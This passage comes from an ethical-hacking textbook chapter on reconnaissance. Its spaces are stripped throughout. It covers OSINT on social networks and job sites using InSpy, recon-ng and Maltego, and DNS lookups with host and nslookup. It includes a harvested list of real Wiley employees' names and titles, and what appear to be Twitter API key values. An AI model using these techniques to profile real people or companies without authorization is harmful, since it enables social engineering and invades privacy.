PiploutputSocialNetworkingSocialnetworkingsitesarehowpeopleconnect.Theycomeinanumberofdifferentflavorsandhavebeenaroundformorethantwodecades,withthefirstone,sixdegrees.com,launchedin1997.SiteslikeMyspacehavealloweduserstosharemusicandpersonalinformationwithothers.Facebookhasalloweduserstocreatecommunities,sharenewsandinformation,andgetbackintouchwithpeopletheyhavefallenawayfrom.Twitterisoftenusefulfornewsandupdates,aswellasmarketinginformation—­makingannouncements,forexample.LinkedInisusefulforallsortsofbusinesspurposes.Thisincludessharingupdatesaboutcompanyactivities,personalachievements,andmoves.Youcanspendalotoftimelookingforinformationbyhandonthesesites.Therearealsotoolsthatyoucanuse.Oneofthemisonewe’vealreadylookedat.InadditiontousingtraditionalsearchsiteslikeGoogleandBing,theHarvesterwillalsosearchthroughsomeofthesocialnetworksites.Therearealsotoolsthatarespecifictosomeofthesites,suchasLinkedIn.Finally,wehaveatoollikeMaltego,whichisgoodforopensourceintelligenceingeneral,thoughtherearewaysitcanbeusedtosearchsocialnetworksitesfordetailsaboutpeopleandcompanies.FacebookWhilesitesthatmayprimarilybethoughtofaspersonalsitesmayfocusmoreonindividuals,theyarestillusefulforsomeonedoingworkasanethicalhacker.AsitelikeFacebook112 Chapter4  Footprintingand Reconnaissance■isinterestingbecausepeopleseemtolettheirguarddownthere,postingalotofdetailsthatperhapstheyshouldn’t.Whattheyoftenfailtorealizeishowmuchofwhattheypostissearchable.Overtime,Facebookhasvastlyimprovedhowmuchinformationcanbeacquired,thoughit’sstillnotgreat.Severalyearsago,therewasawebsite,www.weknowwhatyouredoing.com,thatsearchedthroughFacebookpoststhatwouldfallintooneoffourcategories—­whowantstogetfired,whoishungover,whoistakingdrugs,andwhohasanewphonenumber.Figure 4.5showssomeofthepostsfromthesitebeforeitgottakendownbecausetheapplicationprogramminginterface(API)itusedisnolongeravailable.FIGURE 4.5 www.weknowwhatyouredoing.comThisisnottosaythatFacebooknolongerhasanAPI.TheFacebookGraphAPIstillexists.Itjustisn’tasopenasitoncewas.ThereisstillaGraphAPI,anditcanstillbeusedinapplications.Infact,FacebookprovidesaGraphAPIExplorerwherequeriestotheAPIcanbetested.Figure 4.6showstheGraphAPIExplorer.Nearthetop,youcanseethereisanaccesstoken.Thistokenisgeneratedafteranumberofpermissionsareselected.Thetokenisbasedontheuseryouareloggedinas.Onceyouhaveatoken,youcangenerateaquery.Thequeryshownisthedefaultquery,requestingtheIDandnamefortheuser.Ofcourse,thenameisminesincetheaccesstokenwasbasedonmylogin.OpenSourceIntelligence 113FIGURE 4.6 FacebookGraphAPIYoudon’thavetocreateanapplication,though,togeneratesearches.Searchescanbedonemanually.Facebookisnotonlyusedbyindividuals.Itisalso,often,usedbycompanies.Manycompaniescreatetheirownpagewheretheycanpostspecificsabouttheirproductsandservices.Thisisanotherlocationwhereyoucangatherinformationaboutthecompany.Figure 4.7showsbusinessdetailsaboutJohnWiley&SonsfromitsownpageinFacebook.Besidestheinformationyoucanseeaboutitslocation,thereareseveralothercategoriesofinformation,suchasReviews,Posts,andCommunity.Thereviewscansometimesprovideenlighteninginformation,andofcourse,thereisthecontactinformationprovided.FIGURE 4.7 JohnWiley&Sonsinformation114 Chapter4  Footprintingand Reconnaissance■Youdon’thavetorelyonjustlookingupbusinessinformationinFacebook,though.Peopleregularlypostdetailsabouttheiremployersontheirpersonalpages.Unfortunately,thisiswheresearchinginFacebookcanbecomechallenging.Youcan’t,afterall,justsearchforallemployeesofaparticularcompanyusingtheusualsearch.However,ifyouhavefoundsomenamesofemployeesusingothermeans,youcanusethosenamestofindtheirpagesandreadtheirstatusposts.Often,peoplewillincludedetailsoftheirworksituation—­companiestheydoworkforandhaveworkedfor—­aspartoftheirprofile.Thiscanhelpyoutobetterdistinguishtheemployeesfromotherpeoplewiththesamename.Muchofthisreliesonpeoplesettingtheirprivacyoptionscorrectly.Thisisnotalwaysdone,whichmeansyoucanprobablyreadthepostsofalotofpeopleyouarelookingfor.Youcanalsolikelylookattheirphotos.Inanageofsocialmediaandtheexpectationthatyoucanfindoutjustaboutanythingyouwantaboutsomeone,peopleoftendon’tthinkaboutwhocanpotentiallyseetheirpostsandphotos.Thisgivesusanadvantage.However,itisn’talwaysthecasethatyouwillbeabletoseewhatsomeoneisdoingandsaying.Figure 4.8showsthedifferentprivacysettingsavailabletoFacebookusers.Oneofthechallengeswiththis,though,isthatitonlypertainstowhatyoudo.Thiswon’tpreventotherpeoplefromseeingwhensomeonesharesoneofyourpostsorphotos.Thenitcomesdowntowhattheirpermissionsaresetto.FIGURE 4.8 FacebookpermissionssettingsSometimes,peoplewillpostastatusabouttheirjob,includingwhattheymayhavebeendoingthatday,ortheymaycheckinatanotherjobsite.Anyofthisinformationcouldpotentiallybeusefultoyou.However,siteslikeFacebookarenotalwaysthebestplacetogetinformationaboutbusinessesandtheiremployees.Thereareothersocialnetworkingsitesthatcanbeabitmoreproductiveforyou.OpenSourceIntelligence 115LinkedInLinkedInhasbeenaroundforaboutadecadeandahalfasofthetimeofthiswriting.Inspiteofanumberofcompetitors(suchasPlaxo)goingoutofbusinessorjustnolongerbeinginthespace,LinkedInisstillaround.Itcontinuestoexpanditsofferingsbeyondtheveryearlydays,whenitwasbasicallyacontactmanager.Thesedays,LinkedInisabusinessnetworkingopportunity,highlyusefulforthoseinsales.Itisalsoagreatsourceforidentifyingjobsyoumaybeinterestedin.Itseemslikehumanresourcespeople,specificallyrecruiters,commonlyuseLinkedIntofindpeopletofillpositions,whetherit’saninternalrecruiterorsomeonewhoworksforarecruitingcompany.BecauseoftheamountofbusinessinformationLinkedIncollects,wecanmakeuseofitasahuntingplatform.Especiallywiththepaidmemberships,LinkedIndoesalotofanalyticsaboutthebusinessesthatmakeuseofit,aswellasthepeoplewhoareonthesite.Ifyouarelookingforinformationaboutatarget,LinkedInprovidesalotofdetail.Justasoneexample,Figure 4.9showssomestatisticsaboutapplicantsforapositionthatisopenandadvertisedthroughtheJobssectionofthewebsite.Wecanseethatthepositionattractseducatedapplicants.Youcanstarttogetasensefortheworkforcebylookingatthesestatisticsacrossmultiplepositions.FIGURE 4.9 LinkedInjobstatisticsJoblistingsareanotherplacetolookfordetailsbeyondthestatisticsaboutapplicantsandtheworkforceoverall.Whatwecanseefromtheselistingsistechnologythatmaybein116 Chapter4  Footprintingand Reconnaissance■placewithintheorganization.AlistingforanetworksecurityengineerhasrequirementsasshowninFigure 4.10.Whilesomeoftheserequirementsaregeneric,therearealsosomethatareveryspecificaboutthetechnologyinuseinthenetwork.Forexample,itappearsthatthecompanymaybeusingCheckPointandPaloAltoNetworksfirewalls.Additionally,ithasCiscoroutersandswitchesinitsnetwork.Thisisafoothold.Wecannowstartthinkingabouthowtoattackthatsortofinfrastructure.Ciscodevices,forsure,havetoolsthatcanberunagainstthemforvariousauditingandattackpurposes.FIGURE 4.10 JobrequirementsforanetworksecurityengineerWedon’thavetolimitourselvestothewebinterface,though,sinceitcanbetedioustokeeptypingthingsandflickingthroughpages.Instead,wecanusetheprogramInSpy.ThisisavailableasapackagethatcanbeinstalledonKaliLinux.It’saPythonscript,though,thatcanberunfromanywhereifyouwanttodownloadittoanothersystem.RunningInSpy,wecangatherjoblistingsbasedonalistoftechnologyrequirements.Ifyouprovideatextfilewiththetechnologyyouwanttolookfor,InSpywilllookforjobsatacompanyyouspecifythatmatchthosetechnologies.Beyondjobs,though,wecanuseLinkedIntoharvestinformationaboutpeople.Thereareacoupleofreasonstolookuppeople.Oneisjusttogetsomenamesandtitlesthatyoumayuselater.Anotheristhatevenifjobdescriptionsdon’thaveinformationabouttechnology,whenpeopleposttheirjobresponsibilities,theyveryoftendo.Youcanalsogetdetailsabouttheircertifications.SomeonewithaloadofCiscocertifications,forexample,isprobablyemployedatacompanythathasalotofCiscoequipment.Don’toverlooknontechnicalroleseither.Anyonemayprovidealittleinsightintowhatyoumayfindintheorganization.Youmaygetinformationabouttelephonesystemsanddocumentmanagementsystemsthatthecompanyuses,eveniftheemployeeisn’tanadministrator.Again,weturntoInSpyforalittlehelphere.Weprovideatextfilewithtitlesinit.Providingpartialtitlesworks.ThetextfileIamusingforourlittleforayherejusthasthewordsengineer,editor,andanalystinit.You’llseeinthefollowingcodethatthetitlesreturnedincludemorewordsthanjustthose.Thismeansyoudon’thavetobeexactaboutOpenSourceIntelligence 117thetitlesyouarelookingfor.Youdohavetoprovideafile,though.InSpywon’tjustsearchblindlythroughLinkedInforeverypersonataparticularcompany.Inadditiontothetextfile,youtellInSpywhatthecompanyyouarelookingatis.Youcanseethecommandlineusedtocalltheprogramaswellasapartiallistingofpeople.Thisparticularsearchreturned59people,soonlysomeofthemareshownherejusttogiveyouasenseofthetypesofresponsesyoucanget.InSpyResultsfrom anEmployeeSearch$inspy-­-­empspytitle-­list-­small.txtWileyInSpy2.0.32018-­07-­0216:00:5259Employeesidentified2018-­07-­0216:00:52FelixRCabralSr.AvayaVoiceEngineer–VoiceInfrastructure2018-­07-­0216:00:52UtaGoebelDeputyEditoratWileyVCH2018-­07-­0216:00:52JaniceCruz(L.I.O.N.)QualityAssuranceAnalystatWileyEducationSolut2018-­07-­0216:00:52CoralNuñezPurasFinancialPlanningandAnalystinWiley2018-­07-­0216:00:52JamieWielgusEditoratJohnWileyandSons2018-­07-­0216:00:52StacyGerhardtEngineerinTrainingatWiley|Wilson2018-­07-­0216:00:52MartinGraf-­UtzmannEditoratWileyVCH2018-­07-­0216:00:52JamesSmith,EITMechanicalEngineeratWiley|Wilson2018-­07-­0216:00:52MohammadKarazounSoftwareTestEngineer(ProductAnalyst)atJohnW2018-­07-­0216:00:52RobertVocileStrategicMarketAnalystatWiley2018-­07-­0216:00:52MishaDavidofSeniorBusinessAnalystConsultantatWiley2018-­07-­0216:00:52AleksandrLukashevichAutomationTestingEngineeratJohnWileyandSons2018-­07-­0216:00:52EkaterinaPerets,Ph.D.AssistanteditoratWiley2018-­07-­0216:00:52GuangchenXuEditor@Wiley2018-­07-­0216:00:52RalfHenkelEditorInChiefatWiley-­Blackwell2018-­07-­0216:00:52sonaljainWileyIndia2018-­07-­0216:00:52AbhinayKannetiQAAutomationEngineeratWileyPublishing2018-­07-­0216:00:52OlgaRoginkin,PMPBusinessAnalystatJohnWileyandSons2018-­07-­0216:00:52RaziGharaybehSeniorQualityAssuranceEngineeratJohnWileyan2018-­07-­0216:00:52DanielBleyerSeniorSCCMSystemsEngineeratWiley2018-­07-­0216:00:52JohnCoughlanSeniorProjectEngineeratWiley2018-­07-­0216:00:52StephanieHillProductionEditoratWiley118 Chapter4  Footprintingand Reconnaissance2018-­07-­0216:00:522018-­07-­0216:00:522018-­07-­0216:00:522018-­07-­0216:00:522018-­07-­0216:00:522018-­07-­0216:00:52Wiley2018-­07-­0216:00:522018-­07-­0216:00:522018-­07-­0216:00:522018-­07-­0216:00:52InformationSys■JörnRitterbuschEditor-­in-­ChiefbeiWiley-­VCHAldenFarrarAssistantEditoratWileyGilatMandelbaumStrategyAnalystInternatWileyChelseaMeadePricingAnalystatWileyBabakMostaghaciAssociateEditoratWiley-­VCHVibhushitaMisraTestingAnalyst/TestingTeamLeadatMohammedMnayyesQualityEngineeratJohnWileyandSonsDavidKimAssociateEditor|SocietyJournals|WileyLaurenEllissProjectEngineeratWileyAmitWawdhaneDataAnalystatWiley|MastersinInSpyisnottheonlyutilitywecanusetodoautomaticsearchesinLinkedIn.WecanalsousetheHarvester,justaswedidearlier.InsteadofsearchsiteslikeGoogleorBing,wecanindicateLinkedInasthedatasourcetosearchin.Fortunately,thisissomethingtheHarvesterwilldowithoutrequiringanAPIkey.ManysiteswillrequireAPIkeystoaccessprogrammatically.Itmaintainssomelevelofaccountabilityandpreventstheservicefrombeingoverusedormisused.TwitterAnothercommonsocialnetworkingsiteorserviceisTwitter.ThereisalotpostedtoTwitterthatcanbeofsomeuse.Again,programmaticaccesstoTwitterisuseful.Youcansearchusingtheregularinterface,butit’ssometimeshelpfultobeabletouseothertools.TogainaccesstoTwitterprogrammatically,youneedtogetanAPIkey.ThismeansyouneedtotellTwitteryouarecreatinganapplication.YoucaneasilytellTwitteryouarecreatinganapplicationwithoutanyspecialcredentialsthroughtheTwitterdeveloper’swebsite.Whenyougothroughtheprocesstocreateanapplication,whatyouaredoingiscreatingidentificationinformationthatyourappneedstointeractwiththeTwitterservice.InFigure 4.11,youcanseekeysandaccesstokensforanapp.WhatyoumaynoticeinFigure 4.11isthattheappisnamedrecon-­ng-­me.ThereasonforthisisthatIcreatedtheappjusttogetthekeyandtokensoIcouldadditintorecon-­ng,atoolusedforreconnaissancethatincludesmanyplugins.SomeofthesepluginsrequireAPIkeysoraccesstokenstobeabletointeractwiththeservicebeingqueried.That’sthecasewiththeTwitterplugin.Inthefollowingcode,youcanseethelistofAPIkeysthatrecon-­ngusesandtheAPIkeyssetforTwitter.OpenSourceIntelligence FIGURE 4.11 Twitterkeysandaccesstokensrecon-­ngKeys[recon-­ng][default]>keyslist +—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­––––––––––––––––––––––––––––––––––––––––––––––––+|Name|Value|+—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­—­––––––––––––––––––––––––––––––––––––––––––––––––––––––+|bing_api|||builtwith_api|||censysio_id|||censysio_secret|||flickr_api|||fullcontact_api|||github_api|||google_api||119120 ||||||||||||Chapter4  Footprintingand Reconnaissance■google_csehashes_apiipinfodb_apijigsaw_apijigsaw_passwordjigsaw_usernamepwnedlist_apipwnedlist_ivpwnedlist_secretshodan_apitwitter_apitwitter_secret|||||||||||0DE6bQv89M2AApxCvzfX7AIpd||||||||||||jxhcaFu9FS8AK9g4m6N9OrhkuCQoP6A5ppgSdckOIf3zhD3cMK|+—­—­—­—­—­—­—­—­—­——­—­—­—­—­—­—­—­—­—­—­–––––––––––––––––––––––––—­—­–––––––––––––––––––––––+NowthatwehavetheAPIkeyinplaceforTwitter,wecanrunthemodule.Torunthemodule,wehaveto“use”it,meaningweloadthemodulewiththeusecommand.Onceit’sloaded,wehavetosetasource.Inourcase,thesourceisatextstring,soit’sinquotes,tellingrecon-­ngthatweareusingatextstringforthesource.Thetextstringexpectedhereisauserhandle.Thewordreconwasselectedsomewhatrandomlyanditgotresults.Oncethat’sdone,allweneedtodoisrunthemodule.Youcanseeloadingthemodule,settingthesource,andrunningitinthefollowingcode.Theresultsfromthemodulearetruncatedbecausetherewerequiteafewofthem,andthisisjusttoshowyouhowtousethemodule.UsingTwitterModulein recon-­ng[recon-­ng][default]>userecon/profiles-­profiles/twitter_mentions[recon-­ng][default][twitter_mentions]>showoptionsName-­-­-­-­-­-­LIMITSOURCEinfo'forCurrentValue-­-­-­-­-­-­-­-­-­-­-­-­-­Truedefaultdetails)Required-­-­-­-­-­-­-­-­yesyesDescription-­-­-­-­-­-­-­-­-­-­-­toggleratelimitingsourceofinput(see'show[recon-­ng][default][twitter_mentions]>setSOURCE'recon'SOURCE=>'recon'OpenSourceIntelligence 121[recon-­ng][default][twitter_mentions]>run-­-­-­-­-­-­-­'RECON'-­-­-­-­-­-­-­[*][profile]MattyVsTheWorld-­Twitter(https://twitter.com/MattyVsTheWorld)[*][profile]upthevilla76-­Twitter(https://twitter.com/upthevilla76)[*][profile]davidsummers64-­Twitter(https://twitter.com/davidsummers64)[*][profile]nastypig99-­Twitter(https://twitter.com/nastypig99)[*][profile]rothschildmd-­Twitter(https://twitter.com/rothschildmd)[*][profile]CamillaPayne7-­Twitter(https://twitter.com/CamillaPayne7)[*][profile]Matt5cott-­Twitter(https://twitter.com/Matt5cott)[*][profile]AVFCOfficial-­Twitter(https://twitter.com/AVFCOfficial)[*][profile]CamillaPayne7-­Twitter(https://twitter.com/CamillaPayne7)[*][profile]Matt5cott-­Twitter(https://twitter.com/Matt5cott)[*][profile]AVFCOfficial-­Twitter(https://twitter.com/AVFCOfficial)[*][profile]yorkshireAVFC-­Twitter(https://twitter.com/yorkshireAVFC)Becausewearerunningthetwitter-­mentionsmodule,weareusingthetextstringtosearchformentionsinTwitter.Whatwegetbackareprofilesfromusersthatwerementionedbyagivenhandle.Youcoulddothereverseoftheseresultswiththetwitter_mentionedmodule,whichreturnsprofilesthatmentionedthespecifiedhandle.Finally,wecanlookfortweetsthathappenedinagivengeographicareausingthelocations-­pushpin/twittermodule.Wecanspecifyaradiusinkilometerswithinwhichwewanttosearchusingthismodule.Thereisanothertoolthat’susefulforreconnaissanceoverall,butsinceithasTwitterabilities,we’lltakealookatithere.Maltegousesavisualapproachbycreatinggraphsfrom122 Chapter4  Footprintingand Reconnaissance■thedatathathasbeencollected.Itcanbeusefultohaveentityrelationshipsidentified,likeparent-­childrelationshipsbetweenpiecesofdata.Maltegousestransformstopivotfromonepieceofinformationtoanother.Acollectionoftransformsiscalledamachine,andit’sagoodplacetostart.Figure 4.12showspartoftheoutputfromTwitterDiggerX,whichanalyzestweetsfromtheusernameprovided.Asyoucansee,yougetagraphthatisstructuredlikeatree.Thisisbecauseeverypieceofdatacollectedcanpotentiallyyieldanotherpiece,whichwouldbeachild.FIGURE 4.12 MaltegographfromTwitterRT@champlainonline:@securitypr...RT@coderanch:Winfreebookfro...#coderanch@DefenseIT#BestCaseStudy#coderanch#Securityhttps://t.co/GR3Maltegocanbeagoodtooltocollectreconnaissancedata,especiallyifyouwantavisualrepresentationofit.WhilethereareseveralothertoolsthatcancollectthesamedataMaltegodoes,Maltegodoeshavetheadvantageofgivingyouaquickwaytocollectadditionaldatabyjustselectinganodeonthegraphandrunningatransformonittopivottoanotherdatacollectiontool.Youcanstartwithahostname,forinstance,andcollectanIPaddressfromitbyjustrunningatransform.ThereareadditionalTwittermachinesandtransformsasidefromTwitterDiggerX.YoucanalsomonitorTwitterfortheuseofhashtags,forexample.Thiswillprovidealotofcapability,inadditiontoalloftheothercapabilities,tosearchTwitterfrominsideMaltego.ActivityObtainacopyofMaltegoCommunityEdition(availablepreinstalledinKaliLinux).UseMaltegotolocateasmuchinformationaboutyourselfasyoucanusingthemachinesandtransformsavailable.OpenSourceIntelligence 123JobSitesEarlierwelookedatLinkedInasasourceofinformation.OneareaofinformationwewereabletogatherfromLinkedInwasjobdescriptions,leadingtosomeinsightsaboutwhattechnologyisbeingusedatsomeorganizations.Forexample,Figure 4.13showssomequalificationsforanopenposition.ThisisforaseniorDevOpsengineer,andthelistingwasonindeed.com.Whilethetechnologiesarelistedasexamples,youcertainlyhavesomestartingpoints.Youknowthecompanyisusingrelationaldatabases.Thisisn’tsurprising,perhaps,sincesomanycompaniesareusingthem.Itdoestellyou,though,thattheyaren’tusingNoSQL,whichincludesthingslikeMongoDBandRedis.YoualsoknowthattheyareusingAmazonWebServices.Sincetheyarelookingforsomeonecertifiedthere,thisisacertainty.FIGURE 4.13 JoblistingwithtechnologiesIfyouwantedtotrytodosomethingthroughthewebapplication,youknowtheyareusingRESTfulinterfacesfortheapplication.It’snotmuch,butit’sastartingpoint.Asyoulookoverjoblistings,youstarttobeabletoreadthemwithaneyetowardpickingoutpotentialtargets.Afteryou’vebeenreadingthemforawhile,youwillstarttopickoutsomeofthelanguageoftheselistings.Asanexample,thelistingusesthewordlikeinseveralofthelines.Whileyoucan’tgetacompletelineonwhatisused,youcancertainlyrulesomethingsout,aswedidearlier.Therearealotofplacestogolookingforjoblistings.Whileintheolddays,weusednewspapers,andyou’dhavetogetanewspaperintheregionyouwantedtolookforajobin(orscareupinformationaboutacompanyyouweretryingtoresearch),nowjobpostingsareeverywhereonline.SomeofthebigwebsitesyoumightuseareMonster,Indeed,Glassdoor,CareerBuilder,andDice.Youshouldalsokeepthecompanyitselfinmind.Whilemanycompaniesusethejobpostingsites,theremaybesomecompaniesthatpostjobsontheirownsite,andtheymaynotbeavailableelsewhere.YoumayalsocheckspecializedsiteslikeUSAJobsandClearanceJobs.Anyofthesejobpostingsmayprovideyouwithsomeinsightintonotonlytechnologybutalsoorganizationalstructure.AsImentionedearlier,don’tfocusonlyontechnology124 Chapter4  Footprintingand Reconnaissance■listings.Youcangatheradditionalinformationaboutthecompanyusingotherjoblistingsthataren’tabouttechnology.DomainNameSystemWhileyoucangatheralotofinformationatadistance,atsomepoint,youneedtodivein.Thisstilldoesn’tmeanyouaregoingfullyactive,butyou’regoingtostartgatheringdetailsaboutthescopeofwhatwearedealingwith.Whenyouinteractwithsystemsonyourtarget,andeveryothersystemaswell,youneedtocommunicatewithanIPaddress.However,humansaren’tgoodatrememberingstringsofnumbers.Instead,weusehostnames,butthatmeansweneedsomethingthatwilltranslatethesehostnamesintoIPaddressesforus.ThisiswheretheDNScomesin.DNSisatieredsystem,andit’stieredinacoupleofways.Firstisthehostnamesweuse.Icanuseanexampleheretohelptodemonstrate.www.labs.domain.comisahostnamebecauseitreferstoaspecifichostorsystem.It’sbesttoreadthehostnamefromrighttoleft,becausethat’showDNSwillreaditwhenitcomestimetoresolvingthehostnametoanIPaddress.Inthebeginningwerethetop-­leveldomains(TLDs),andtheywere.com,.org,and.edu,aswellasalltheonesforthedifferentcountries(.uk,.au,.ca,.sk,.us,andsoon).Later,manymorewereadded,buttheyareallstillTLDs.Theyareconsideredtop-­leveldomainsbecauseyoumightgraphDNSlikeatree.AlltheTLDswouldbeatthetop,andtheneverythinggrewoutfromthoseTLDs.Second-­leveldomainsarewherewestartaddinginorganizations.TheTLDsbelongtotheInternetatlarge,sotospeak.Theyhaveorganizationsthatmanagethem,buttheydon’t“belong”toanyoneorganization,atleastnotinthewaythesecond-­leveldomainscanbesaidto.Inourexample,thesecond-­leveldomainwouldbedomain.Whenpeoplerefertodomains,theygenerallyrefertothesecond-­leveldomainalongwiththeTLD,ordomain.cominourexample.Undersecond-­leveldomainsaresubdomains.Everydomaincanhaveasmanylevelsofsubdomainsastheyarewillingtomanage.Wehaveasubdomainintheexample.Thesubdomainislabs,anditbelongstothedomaindomain.com.Whenweaddwww,whichisthehostname,tothesubdomain,thesecond-­leveldomain,andtheTLD,weendupwithsomethingcalledafullyqualifieddomainname(FQDN).It’sfullyqualifiedbecauseit’sclearwhatdomainthehostnamebelongsto(thehostnamewww,forinstance,existsincountlessdomains)andit’salsoclearwhathostnameinthedomainwearetalkingabout.YoumayrecognizethethreeletterswwwasstandingforWorldWideWeb,whichitalsostandsforhere.WhenthelettersaremeanttorefertotheWorldWideWeb,theyarecapitalized—­WWW.Whenyouseewww,itwillrefertoahostnameratherthantheoverallWorldWideWeb.DomainNameSystem 125NowthatyouhaveabasicunderstandingofthenamingstructureusedwithinDNSandabasicunderstandingofwhatDNSisusedfor,wecanstartlookingathowyoumightuseDNStogatherinformationaboutyourtargets.First,we’llstartwithnamelookups.Thisincludeshowanamelookupactuallyworks,andthenwe’lllookatsometoolsthatcanbeusedtoperformthenamelookups.Afterthat,we’lllookatdoingzonetransfers,whichareessentiallybulknamelookups.NameLookupsWhenyouvisitawebsite,youentersomethingcalledaUniformResourceLocator(URL).TheURLconsists,commonly,oftwoparts.ThefirstistheUniformResourceIdentifier(URI).Thisistheprotocolused(e.g.,http://orftp://).FollowingtheURIistheFQDN.YourbrowserwillissuearequesttotheoperatingsystemtoopenaconnectiontotheFQDNattheportindicatedbytheURI.Beforetheconnectioncanbeopened,however,thesystemneedstohaveanIPaddresstoputintothelayer3headers.So,itissuesanameresolutionrequest.Eachcomputerwillhaveatleastonenameresolverconfigured.Thenameresolveristhesystemyourcomputergoestoinordertoaccomplishthenameresolution.Thisdescriptionassumesthatyourcomputerhasnevervisitedthesitebefore.Yoursystemwillcommonlycachetheresolvedaddresssoitdoesn’thavetogeneratenetworktraffictoaskagain.Similarly,theresolveryoursystemaskswillalsogenerallycacheresultssoitdoesn’thavetokeepaskingitsauthoritativeserver.Wesimilarlyassumethatnoothersystemusingthesameresolverhasrequestedtheinformation,resultinginafreshrequest.ThenameresolverisaDNSserver.IttakesinDNSrequestsandresolvesthem,basedonwhatisbeingasked.Typically,thenameresolveryouwillhaveconfiguredwillbewhatiscalledacachingnameserver.Thismeansitgetsrequestsfromendpoints,resolvesthem,andcachestheresultsforefficiency.Thisisdistinctfromwhatisknownasanauthoritativeserver,whichholdstherecordsforagivendomain.We’llgettoauthoritativeserversshortly.So,thefirstDNSrequestistheonefromyoursystemtothecachingserver,whereverithappenstobelocated.Figure 4.14showsabasicflowofhowacompleteDNSnameresolutionwouldwork,soyoucanfollowalongthere.WestartwiththerequestlabeledA.Thisgoestothenameresolver,labeledCachingDNS.ThecachingDNSserverchecksitscacheandseesthatithasnoIPaddressstored,soitbeginssomethingcalledarecursivenamequeryorrecursivenameresolution.It’scalledrecursivebecauseitwillendupwithmultiplerequeststhatkeepgettingnarroweruntilweendupwithwhatwewant.ThecachingserverwillneedtostartwiththeTLD.Itwillhaveahintsfile,indicatingtheIPaddressesfortherootnameservers.Forourexample,thecachingserverwillneedtoidentifytheservertouseforthe.comTLD.Onceithasidentifiedtheserveritneedstosendarequestto,requestBgoesout,askingtherootserverfortheIPaddressofthenameserverforthedomain.comdomain.126 Chapter4  Footprintingand Reconnaissance■FIGURE 4.14 DNSnameresolutionBRootServerCAdomain.comYourPCCachingDNSDlabs.domain.comEwww.labs.domain.comTherootserverhasthenameserverdetailsforallthedomainsthatfallundertheTLDitisresponsiblefor.TherootserverwillreplytoourcachingserverwiththeIPaddressforthenameserverfordomain.com.Whenwedidthewhoislookupsearlier,attheendofawhoislookuponadomainwillbethenameserversforthatdomain,sincethenameserversarestoredwiththedomain.This,though,iswhywhatwearedoingiscalledarecursivequery.Wecan’tjustasktherootserverfortheIPaddressofthehostname,sowehavetoaskitforapointertowhotoasknext.RequestCistheDNSrequestaskingthenameserverfordomain.comaboutlabs.domain.com.Sincelabs.domain.comisseparatefromdomain.com,whatourcachingservergetsbackisanothernameserver.Thismeansonemorerequest.WearenowatthepointwheretheFQDNisbeingaskedfor.RequestDgoesoutaskingfortheIPaddressofwww.labs.domain.com.Theauthoritativeserver,whichistheoneweareaskingbecauseithastheauthoritativeinformationaboutthatdomain,respondswiththeIPaddress.ItmayactuallyrespondwithmultipleIPaddresses,butforourpurposes,we’regoingtojustsayitcomesbackwithasingleIP.OncethecachingserverhastheIP,itsendstheresponsebacktooursystem,whichcanthenissuerequestE,whichisn’taDNSrequestbutaconnectionrequesttothewebserver.DomainNameSystem 127NowthatyouhaveahandleontheprocesswearegoingthroughtogetIPaddressesbackfromDNSservers,wecanstartlookingattoolswecanusetogetthoseaddresses.UsingHostPerhapstheeasiesttooltouseishost.ThisisaprogramthatyouwillfindonmostUnix-­likesystems,includingLinuxsystems.IthasnoWindowsanalog,unfortunately.Ifyoudon’thaveitinstalledbydefault,youcanprobablygetitinstalled.Usingitisverystraightforward.YoujustpassthehostnameyouwanttheIPaddressfortohostandyouwillgetaresponse.Youcanseeanexampleofthatinthefollowingcode.DNSLookupUsinghost$hostwww.sybex.comwww.sybex.comhasaddress208.215.179.132$hostwww.sybex.com4.2.2.1Usingdomainserver:Name:4.2.2.1Address:4.2.2.1#53Aliases:www.sybex.comhasaddress208.215.179.132$host208.215.179.132132.179.215.208.in-­addr.arpadomainnamepointer132.179.215.208.in-­addr.arpadomainnamepointer132.179.215.208.in-­addr.arpadomainnamepointer132.179.215.208.in-­addr.arpadomainnamepointer132.179.215.208.in-­addr.arpadomainnamepointer132.179.215.208.in-­addr.arpadomainnamepointer132.179.215.208.in-­addr.arpadomainnamepointer132.179.215.208.in-­addr.arpadomainnamepointer132.179.215.208.in-­addr.arpadomainnamepointermotorfluctuations.net.managementencyclopedia.org.smdashboard.wiley.com.elansguides.com.currentprotocols.net.geographyencyclopedia.com.separationsnow.info.jcsm-­journal.com.literature-­compass.com.InadditiontojustastraightforwardlookupofahostnametoanIPaddress,wecanuseadifferentserverthantheonethatisdefinedasourresolver.Youcanseeinthesecondrequest,IaddedanIPaddresstothecommandline.ThisIPaddressisacachingserverthatisavailableforanyonetouse.ItwascreatedbyGTEInternetworkingandhasbeenaroundforatleastthebetterpartofacoupleofdecadesatthispoint.Sinceitisalsoacachingserverthatisopenforanyonetouse,wecanissuerequeststoitanditwillgothroughthesameprocessdescribedearlier,justasifitwereourowncachingserver.128 Chapter4  Footprintingand Reconnaissance■Youcanalsoseefromtheexample,whereitsayshost208.215.179.132,thatyoucanlookupahostnamefromanIPaddress.EveryaddressblockwillhaveaDNSserverthatbelongstoit.ThismeansthatrequestscanbeissuedtotheDNSserverforanaddressblocktodosomethingcalledareverselookup,meaningthatwehaveanIPaddress,andwewantthehostnamethat’sassociatedwithit.Asyoucansee,oftenanIPaddresswillhaveseveralhostnamesassociatedwithit.Thismaybethecasewhereawebserverishostingvirtualservers—­meaningthewebservercandeterminewhatcontenttoserveupbasedonthehostnameintherequest.TherequestforthisIPaddressresultedin197responses,buttheyhavebeentruncatedforspace.UsingnslookupAnothertoolthatcanbeusedisnslookup.Thiscanbeusedjustliketheprogramhost,meaningyoucouldjustrunnslookupwww.sybex.comandgetaresponse.Anadvantagetonslookup,however,isthatyoucanissuemanyrequestswithouthavingtokeeprunningnslookup.Whenyourunnslookupwithoutanyparameters,youwillbeplacedintoannslookupshell,whereyouareinteractingwiththeprogram,issuingrequests.Inthefollowingcode,youcanseeanexchangeinnslookup.Weareultimatelylookingforthesameinformationaswegotearlierusinghost,butwearegoingaboutitinadifferentmanner.Usingnslookupfor 